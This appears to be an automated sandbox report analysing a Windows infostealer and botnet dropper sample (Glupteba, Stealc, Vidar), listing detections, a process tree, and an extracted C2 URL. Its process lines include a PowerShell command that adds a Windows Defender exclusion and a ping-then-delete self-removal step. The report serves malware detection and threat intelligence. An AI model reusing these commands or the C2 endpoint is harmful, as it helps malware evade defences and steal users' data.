Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dl7WL77rkA.exe

Overview

General Information

Sample name:dl7WL77rkA.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:39245735a6a4d2495cb6a5207bb9d5e2b6c058d113b6b0efc292330a89611757
Analysis ID:1406292
MD5:f1e075f8cebe5aaca53ed7c158d81cbd
SHA1:11f80b386b8a04a4f82d065cefb634bb389e9dbd
SHA256:39245735a6a4d2495cb6a5207bb9d5e2b6c058d113b6b0efc292330a89611757
Infos:

Detection

Glupteba, Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Yara detected Glupteba
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Creates HTML files with .exe extension (expired dropper behavior)
Disables UAC (registry)
Drops script or batch files to the startup folder
Found Tor onion address
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dl7WL77rkA.exe (PID: 3876 cmdline: C:\Users\user\Desktop\dl7WL77rkA.exe MD5: F1E075F8CEBE5AACA53ED7C158D81CBD)
    • powershell.exe (PID: 44248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 44256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 44264 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • CGZL5y3D81OCbb2NABnHZhPM.exe (PID: 44932 cmdline: "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
        • wfplwfs.exe (PID: 7796 cmdline: C:\Users\user\AppData\Local\Temp\wfplwfs.exe MD5: ED7321DFC04F801D87AB2F3B4ABCB8FB)
          • rundll32.exe (PID: 11040 cmdline: C:\Windows\system32\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • rundll32.exe (PID: 11316 cmdline: C:\Windows\system32\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 8480 cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 9660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 11584 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • kDgMkoNM3lKxwY8D8wOiP15F.exe (PID: 44956 cmdline: "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
        • syncUpd.exe (PID: 5376 cmdline: C:\Users\user\AppData\Local\Temp\syncUpd.exe MD5: DBA6DB51EA13E585AEE6136021836641)
        • BroomSetup.exe (PID: 23124 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: EEE5DDCFFBED16222CAC0A1B4E2E466E)
      • 3BiVM2uOsvGVXA1BoDorVuCU.exe (PID: 44984 cmdline: "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • VT4T5BrKWgz9d48cmEd8ePkZ.exe (PID: 7280 cmdline: "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • sUyDoVTGsfEnMY0oeyexTBut.exe (PID: 7308 cmdline: "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • VvPx7JMqkEvTJAQ2rPS2y2wf.exe (PID: 7392 cmdline: "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • BTnjKpTBDzKtQo69b5SrwYDx.exe (PID: 7444 cmdline: "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe (PID: 7568 cmdline: "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • nxFajWDYSB3pQQxmrqt3pD1T.exe (PID: 7740 cmdline: "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
      • yq7sRYx0zxf2nUHNI8myIvQb.exe (PID: 7880 cmdline: "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • yzAPe25HGnxqbkafYprXvqQ2.exe (PID: 8012 cmdline: "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • LP2uR8v5nKtflOO7HsEX74Am.exe (PID: 8104 cmdline: "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • 65bl5N8ldxUdfHpwZdasCC1T.exe (PID: 8128 cmdline: "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
      • LEGkdjk2eFexBjdd51KvbC5Q.exe (PID: 8148 cmdline: "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
      • BitVM4h79HXjwHpz9WBgoxJI.exe (PID: 8200 cmdline: "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • YfSmDepXBWKsGmamEEWNYwB5.exe (PID: 8520 cmdline: "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • RC2DCMOzLtOY3PfjMU0omeEi.exe (PID: 8680 cmdline: "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • pxzTG78L668f3mDyeDkHXryr.exe (PID: 8708 cmdline: "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • MK1r6sTJJ0KuvAGWdjimbW8H.exe (PID: 8740 cmdline: "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • gIvDEh2BZp9B1K9gi8nXHxAG.exe (PID: 8816 cmdline: "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
        • Conhost.exe (PID: 20032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PM6qM9TthMxsL1RAWEhuUNLx.exe (PID: 10220 cmdline: "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
    • AddInProcess32.exe (PID: 44316 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 44548 cmdline: C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • wfplwfs.exe (PID: 11168 cmdline: C:\Users\user\AppData\Local\Temp\wfplwfs.exe MD5: ED7321DFC04F801D87AB2F3B4ABCB8FB)
  • chrome.exe (PID: 14672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hentaitoonami.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 16744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cmd.exe (PID: 19504 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 19828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 24136 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 25656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
      0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
        00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Click to see the 49 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        15.2.syncUpd.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          15.2.syncUpd.exe.400000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
            15.3.syncUpd.exe.22d0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              15.3.syncUpd.exe.22d0000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                15.2.syncUpd.exe.8f0e67.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 27 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
                  Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\system32\rundll32.exe, CommandLine: C:\Windows\system32\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\wfplwfs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\wfplwfs.exe, ParentProcessId: 7796, ParentProcessName: wfplwfs.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe, ProcessId: 11040, ProcessName: rundll32.exe
                  Sigma detected: Outbound RDP Connections Over Non-Standard Tools
                  Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 125.227.225.157, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50653
                  Sigma detected: Potentially Suspicious Malware Callback Communication
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 177.230.183.185, DestinationIsIpv6: false, DestinationPort: 10101, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49959
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentImage: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentProcessId: 3876, ParentProcessName: dl7WL77rkA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, ProcessId: 44248, ProcessName: powershell.exe
                  Sigma detected: Suspicious Outbound Kerberos Connection
                  Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DestinationIp: 93.157.248.108, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50292
                  Sigma detected: Communication To Uncommon Destination Ports
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 102.68.128.212, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49725
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentImage: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentProcessId: 3876, ParentProcessName: dl7WL77rkA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, ProcessId: 44248, ProcessName: powershell.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 160.248.80.91, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 53606
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentImage: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentProcessId: 3876, ParentProcessName: dl7WL77rkA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, ProcessId: 44248, ProcessName: powershell.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 44264, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.bat

                  Snort Signatures

                  Timestamp:03/11/24-03:30:46.099473
                  SID:2856466
                  Source Port:55130
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:03/11/24-03:30:45.843635
                  SID:2856463
                  Source Port:51596
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAvira: detection malicious, Label: HEUR/AGEN.1316657
                  Source: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen7
                  Source: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen7
                  Found malware configuration
                  Source: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                  Source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeReversingLabs: Detection: 75%
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeReversingLabs: Detection: 57%
                  Multi AV Scanner detection for submitted file
                  Source: dl7WL77rkA.exeReversingLabs: Detection: 62%
                  Yara detected Glupteba
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.2d80e67.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.2da0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.2e10e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.2e10e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.2cb0e67.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.2e80e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
